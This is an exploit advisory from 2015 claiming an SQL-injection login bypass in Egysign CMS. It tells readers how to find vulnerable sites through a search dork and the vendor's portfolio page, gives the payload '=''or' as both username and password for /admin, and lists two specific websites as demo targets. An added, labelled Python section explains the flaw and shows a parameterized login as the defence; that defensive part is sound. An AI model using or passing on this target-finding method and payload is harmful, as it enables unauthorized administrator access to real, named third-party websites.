
Egysign CMS Authentication Bypass

Author: WH!T3 W01F, Published: 02-04-2015
# Exploit Title : Egysign CMS Authentication Bypass
# Date : 02/04/2015
# Exploit Author : WH!T3 W01F
# Contact : whit3_w01f@att.net
# Category : Web Application Bugs
# Home : Iran-Cyber.Org - Iran-Cyber.In
# Google Dork : intext:powered By Egysign
# Tested On : Windows

1. Description

With This Vulnerability You Can Bypass Authentication And Log In As An Admin.

2. Proof Of Concept

You Can Find Targets By 2 Ways :

First Way :

Go To This Address : http://egysign.com/Portfolio.aspx

At That Address There Are Many Targets. After You Have Selected Your Target, Use This Exploit :

# http://site.com/admin

Then, If The Admin Page Comes Up, Use These Usernames And Passwords :

Username : '=''or'
Password : '=''or'

Second Way :

Search This Dork : intext:powered By Egysign

Then Use This Exploit :

# http://site.com/admin

Then, If The Admin Page Comes Up, Use These Usernames And Passwords :

Username : '=''or'
Password : '=''or'
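
Why those credentials matter to a defender, as an added example that is not part of the original advisory or the CMS code: it shows how the quoted string changes the shape of a concatenated login query, next to a parameterized login that treats it as plain data. It assumes the login query is built by string concatenation (the advisory does not show the code); the query template, table, account and function names are constructed for illustration.

```python
import hashlib
import hmac
import re
import sqlite3

# Assumed root cause (the advisory does not show the CMS code): a login
# query assembled by pasting the form fields between quotes.
TEMPLATE = "SELECT id FROM users WHERE username = '{u}' AND password = '{p}'"

# One SQL token: a quoted literal ('' inside it is an escaped quote), a word, or a symbol.
TOKEN = re.compile(r"'(?:[^']|'')*'|\w+|\S")

def skeleton(sql):
    """Token shape of a statement, with every string literal collapsed to '?'."""
    return ["?" if t.startswith("'") else t.upper() for t in TOKEN.findall(sql)]

def changes_structure(username, password):
    """True when the submitted values alter the shape of the concatenated query."""
    baseline = skeleton(TEMPLATE.format(u="x", p="x"))
    return skeleton(TEMPLATE.format(u=username, p=password)) != baseline

def make_db():
    """In-memory database holding one constructed account (sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = b"constructed-salt"
    pw_hash = hashlib.pbkdf2_hmac("sha256", b"correct horse", salt, 100_000)
    db.execute("INSERT INTO users VALUES (?, ?, ?)", ("admin", salt, pw_hash))
    return db

def login(db, username, password):
    """Hardened login: the username is bound as a parameter, so it stays data."""
    row = db.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, stored)

if __name__ == "__main__":
    payload = "'=''or'"  # the credential string quoted in the advisory
    print(TEMPLATE.format(u=payload, p=payload))
    print("structure changed:", changes_structure(payload, payload))
    print("parameterized login accepts it:", login(make_db(), payload, payload))
```

Whether the rewritten predicate evaluates to true depends on the database engine's comparison rules; the change in query structure is what parameter binding rules out.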


# Demo :
# http://diverprofessional.co.uk/admin/
# http://www.injazsys.com/admin/
=========================================
Greetz : | root3r | MOHAMAD_NOFOZI | Sheytan Azzam | KamraN HellisH | JOK3R | Erfan Mig | Alireza_ProMis | Mr.Moein | Pi.Hack | CRYSIS | Siyahi |
